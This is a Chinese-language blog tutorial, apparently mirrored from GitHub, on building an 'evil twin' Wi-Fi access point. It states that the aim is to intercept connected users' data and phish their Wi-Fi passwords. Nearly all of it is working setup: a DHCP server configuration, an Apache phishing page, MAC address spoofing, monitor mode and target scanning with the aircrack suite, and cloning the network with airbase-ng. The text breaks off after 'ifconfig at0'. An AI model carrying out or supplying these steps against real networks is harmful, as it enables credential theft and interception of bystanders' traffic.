山寨wifi接入点

May 31, 2026 · View on GitHub

有一种攻击叫evil twin无线接入攻击,通过将无线网络设置伪装成合法的无线网络名称来实施。通常,双胞胎无线接入点总是缺乏安全特性的,对于用户来说它就像一个正常的wifi热点。

不法分子用这种方法可以截获连接到这个"wifi"用户的敏感数据,也能骗取Wifi认证密码,附带各种恶搞。

安装isc-dhcp-server

这是一个dhcp服务程序,为连接到wifi的用户分配ip。

# apt install isc-dhcp-server

配置Apache2

在用户连接到wifi之后,负责发送假的认证网页。

创建网站目录:

# mkdir /var/www/public_html

编辑:

# vim /etc/apache2/mods-available/userdir.conf

![山寨wifi接入点](../images/2016/5/Screenshot from 2016-05-06 15-20-31.png)

重启Apache:

# systemctl restart apache2

配置isc-dhcp-server

# vim /etc/dhcp/dhcpd.conf

在文件中添加:

authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.0 netmask 255.255.255.0
{
        option subnet-mask 255.255.255.0;
        option broadcast-address 192.168.1.255;
        option routers 192.168.1.1;
        option domain-name-servers 8.8.8.8;
        range 192.168.1.1 192.168.1.100;
}

解决airmon-ng和Network Manager的冲突

# vim /etc/NetworkManager/NetworkManager.conf

在文件尾添加:

[keyfile]
unmanaged-devices=interface-name:wlan0mon;interface-name:wlan1mon;interface-name:wlan2mon;interface-name:wlan3mon;interface-name:wlan4mon;interface-name:wlan5mon;interface-name:wlan6mon;interface-name:wlan7mon;interface-name:wlan8mon;interface-name:wlan9mon;interface-name:wlan10mon;interface-name:wlan11mon;interface-name:wlan12mon

无线网卡的监控模式

# ifconfig wlan0 down    # 关闭无线网卡
# macchanger -r wlan0    # 更改mac地址;随机
# airmon-ng check kill 
# airmon-ng start wlan0  # 启动无线网卡的监控模式

找到一个要山寨的wifi热点

# airodump-ng wlan0mon

记住AP名和频道。

山寨一个wifi

# airbase-ng  -e "test" -c 6 wlan0mon

ifconfig at0